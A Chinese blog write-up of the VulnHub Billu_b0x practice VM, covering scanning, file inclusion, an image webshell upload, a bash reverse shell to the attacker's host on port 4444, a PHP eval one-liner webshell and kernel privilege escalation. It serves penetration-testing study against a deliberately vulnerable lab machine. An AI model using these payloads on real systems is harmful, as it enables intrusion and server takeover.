Billu_b0x

最新推荐文章于 2024-04-23 10:05:03 发布
最新推荐文章于 2024-04-23 10:05:03 发布
阅读量3.4k 收藏 1
点赞数 2
分类专栏: VulnHub 文章标签: VulnHub 渗透 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41523170/article/details/123884301
版权

完整过程

开启虚拟机用kali扫了半天没扫到,还以为环境有问题…最后发现是网络模式设置的仅主机…改成net以后,nmap -sP 192.168.144.1/24 nmap -p 1-655535 -sV 192.168.144.144
在这里插入图片描述
访问80端口在这里插入图片描述
很明显登录框,尝试SQL注入,直接上最高等级,不过还是未果sqlmap -r post.txt --level=5 --risk=3
在这里插入图片描述
然后就扫一下目录呗,
在这里插入图片描述
(字典太大,而且有重复,扫了一个小时,需要优化…)
经过筛选,发现5个可疑的地址:
http://192.168.144.144/test.php
http://192.168.144.144/add.php
http://192.168.144.144/images/
http://192.168.144.144/in.php
http://192.168.144.144/c.php
当然是从文件上传的地方(add.php)看起了,但是好像连正常图片都无法上传,可能是个干扰吧
在这里插入图片描述
再尝试test.php,提示file参数,尝试文件包含,还是注意Content-Type: application/x-www-form-urlencoded,发现可以
在这里插入图片描述
尝试读取配置文件file=/etc/apache2/sites-enabled/000-fault,但是提示“file not found“,在in.php中可以发现根目录信息:
在这里插入图片描述
尝试读取发现成功读取源码:
在这里插入图片描述
先看一下刚刚的add.php,果然是个坑…
在这里插入图片描述
最后在c.php里发现一些有用信息,疑似数据库的账号密码,但是不知道地址
在这里插入图片描述

在别人的目录爆破里面发现了新的地址192.168.144.144/phpmy/index.php,并成功使用"billu","b0x_billu"登录,新找到一个账号密码,biLLu/hEx_it,但是好像没地方用?不对,80端口有登录
在这里插入图片描述
在这里插入图片描述
Add User成功上传一张图片马mua.jpg
在这里插入图片描述
再利用test.php处的文件包含看看panel.php,能不能找到图片马的上传路径,确实存在uploaded_images
在这里插入图片描述
在这里插入图片描述
但是蚁剑无法连接
在这里插入图片描述
重新上传一张命令执行的图片马cmd.jpg
在这里插入图片描述
然后通过panel.php处的文件包含访问cmd.php并传递参数cmd=ls,还是要注意Content-Type: application/x-www-form-urlencoded!!!发现命令可以执行,所以下一步直接写反弹shell
在这里插入图片描述
echo "bash -i > /dev/tcp/192.168.144.128/4444 0>&1" | bash 要注意发送命令前先要url编码,然后kali监听4444端口,发送反弹shell命令,成功反弹shell
在这里插入图片描述

在这里插入图片描述
获取标准shellpython -c 'import pty;pty.spawn("/bin/bash")'
小插曲–不知道为什么shell突然不能用了,然后重连也不好使,最后重启环境就可以了在这里插入图片描述
再有执行权限的目录下写一句话木马echo '<?php @eval($_POST['mua']);?>'>mua2.php,并赋予执行权限chmod +x mua2.php
在这里插入图片描述
使用蚁剑成功连接:
在这里插入图片描述
查看内核版本cat /etc/issue
在这里插入图片描述
找到对应的提权脚本,通过蚁剑上传至靶机:
在这里插入图片描述
将上传上去的.c文件编译并赋予执行权限执行,查看id发现提权成功
在这里插入图片描述

多解

别的大佬扫目录的时候扫到了phpmyadmin的配置文件phpmy/config.inc.php,利用test.php处的文件包含查看配置信息即可发现靶机的账号密码:
在这里插入图片描述
直接ssh登录即可,省去后面上传点、反弹shell、提权等一系列操作…
在这里插入图片描述

Qian途
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
靶机练习之Billu_b0x
10-04
通过该靶场,能够初步了解web渗透的基本流程。小白在了解了web各种漏洞原理,之后,可以练习一下该靶场,靶场做法很多。我也是一个小白,来这里记录一下学习的过程,不喜勿喷!!!感谢!!!
Vulnhub靶机笔记01——Billu_b0x
2301_76329510的博客
04-16 1171
test。
Vulnhub靶机:Billu_b0x
qq_48904485的博客
03-06 503
运行环境:Virtualbox攻击机:kali(192.168.56.101)靶机:Billu_b0x(192.168.56.107)目标:获取靶机root权限和flag靶机下载地址:https://download.vulnhub.com/billu/Billu_b0x.zip。
靶机渗透billu_b0x
学信安技术 卫国家之门
01-10 6844
文章目录*一. billu_b0x 靶机安装*1. 靶机下载2. 开启靶机*二. billu_b0x 靶机渗透*1. 信息收集2. Web渗透3. 反弹shell4. 提权 一. billu_b0x 靶机安装 1. 靶机下载 百度网盘链接提取码 billu_b0x.rar 提取码:8whr 2. 开启靶机 打开 VMware,在左上角选择 - - 文件 - - 打开 找到 billu_b0x 靶机解压位置 开启后如图所示 二. billu_b0x 靶机渗透 开启一台 Kali
CTF综合靶场渗透系列-Billu_b0x
lza20001103的博客
10-11 3586
CTF综合靶场渗透系列-Billu_b0x
红队打靶:billu_b0x打靶思路详解(vulnhub
Bossfrank的博客
07-17 1187
本文是vulhub靶机bulli_b0x的详细打靶过程,涉及到的知识点包括SQL注入、文件包含漏洞利用、php代码审计、图片马的制作等。靶机不难,但细节很多,信息搜集是关键!细节包括使用POST的方法寻找文件包含的漏洞参数、读取index.php的源码确定sql注入的逻辑、上传图片马、找到触发图片马执行的路径、反弹shell的指令要进行url编码、敏感文件搜索碰撞数据库密码与ssh账号密码等等。
靶机渗透(二)——Billu_b0x
qq_45751902的博客
04-18 1833
一、环境配置 kali:192.168.92.5 nat模式 靶机:192.168.92.3 nat模式 二、信息收集 1.扫描ip nmap -sP 192.168.92.0/24 2.端口扫描 半开扫描:nmap -sS 192.168.92.3 全开扫描:nmap -sT 192.168.92.3 3个过程全部完成叫全开扫描,最后一步不做,叫半开扫描。在实际过程中,半开扫描应用的最多,半开扫描不容易被目标电脑日志记录。 3.目录扫描 dirb http://192.168.92.3
Billu_b0x渗透测试
Cper的博客
10-26 534
靶场的测试实践和不同思路
Billu_b0x靶场渗透测试
qq_41567985的博客
11-05 103
总结一下今天的打靶,这个靶场有很多漏洞可以利用,但是我也只是利用了一两个,中间反弹shell那里花了挺多时间的,但是也有提升,让我学到了很多种反弹shell的方法!使用了很多提权命令都不是很行,也在里面使用了wget发现还是不行,后面才查到没有权限需要去/tmp目录下。确实啊,tmp目录本来就容易被忽视,777的权限,这个应该要好好的完善一下权限才行。把限免load改成上传的php文件改成jpg文件之后的名字-send-并且反弹成功。始终反弹不成功,按照网上的方法也都试了试,还是不成功,不是很明白。
billu_b0x靶场通关
tpaer的博客
03-03 638
billu_box靶场通关
billu-b0x靶场渗透
11-14
billu-b0x靶场渗透
Vulnhub-CTF-Writeups:此备忘单针对CTF玩家和初学者,以帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章
05-28
Vulnhub-CTF-Writeups ...比卢:B0x 莫里亚1.1 Lazysys管理员 斗牛犬 BTRSys:DV 2.1 BTRSys 1 难以置信地容易 狄娜 Born2Root G0rmint 基本渗透 BSides Vancuver:2018年 Toppo:1 Billu Box 2 基
Billu_b0x渗透总结
qq_45300786的博客
06-05 4523
Billu_b0x这个靶机也是断断续续的才做完,途中遇到了很多不懂的,但是这也表明进步的空间很大,这个靶机很适合我们这种初级的学习者,其中不乏趣味性,也有点难度,但总体思路是清晰的,有兴趣的同学不妨试试。 1.主机发现 arp-scan -l 或者 nmap -sn 192.168.223.0/24 -oG - 2.端口扫描 nmap -sS 192.168.223.132 或者 nmap -sS -A -Pn -p- -n 192.168.223.132 或者 nmap 192.168.223.0/24
VulnHub渗透实战Billu_b0x
Fly_鹏程万里
06-06 7657
简介VulnHub是一个面向所有人开放的安全靶场,里面有很多安全环境,只要下载相关镜像,在相关虚拟机上面运行就可以练习相关靶场了。里面设计了好多关,如果有耐心一定可以到达峰顶。许多考oscp人员,也会利用vulnhub靶场进行刷题。我们下载了一个经典漏洞靶场,给大家进行演示,希望让初学者知道渗透测试的套路,可以更快的成长。官网:https://www.vulnhub.com/参考了一些国外设计靶场...
(Vulnhub练习)-- billu: b0x渗透实战
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
09-28 367
(Vulnhub练习)-- billu: b0x渗透实战 下载地址 http://www.vulnhub.com/entry/billu-b0x,188/ 扫描主机 netdiscover -i eth0 -r 192.168.100.0/24 目标主机IP:192.168.100.156 信息收集 信息收集的步骤基本上差不多,可根据工具简单写个shell脚本 #!/usr/bin/bash ip=192.168.100.$1 ping -c2 $ip &>/dev/null
vulnhub靶场,Billu_b0x
kukudeshuo的博客
07-21 647
vulnhub靶场,Billu_b0x 环境准备 靶机下载地址:https://www.vulnhub.com/entry/billu-b0x,188/ 攻击机:kali(192.168.58.130) 靶机:Billu_b0x(192.168.58.159) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 ...
VulnHub靶场渗透实战11-Billu_b0x
随心所欲不逾矩
07-31 2074
VulnHub靶场渗透实战11-Billu_b0x
vue2 顶象 安全 验证码的使用
最新发布
lele66688888的博客
04-23 311
类似与这样的登录之前的验证 滑动一个盒子了 或者是 顺序点击文字了 等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值